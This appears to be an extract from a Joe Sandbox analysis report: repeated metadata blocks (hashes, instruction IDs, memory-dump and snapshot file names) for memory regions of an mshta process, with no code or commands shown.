                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.524029259.0000000002980000.00000010.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2980000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction ID: 628bf1acd2a439660c675aa7d355fb100782a7f0b3f999f45bb6bff896789a43
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e756970a09b5c4ff858c155ba47a37592bd869dac7bec08eb7e0f2e65c9fc023
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.515757570.0000000002AB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2ab0000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                    • Instruction ID: 91aecacd629a38b829347d56b7b300b710dafc0d65f2ce9772e7b21fab716baf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000003.515757570.0000000002AB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 02AB0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_3_2ab0000_mshta.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                    • Instruction ID: 91aecacd629a38b829347d56b7b300b710dafc0d65f2ce9772e7b21fab716baf
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: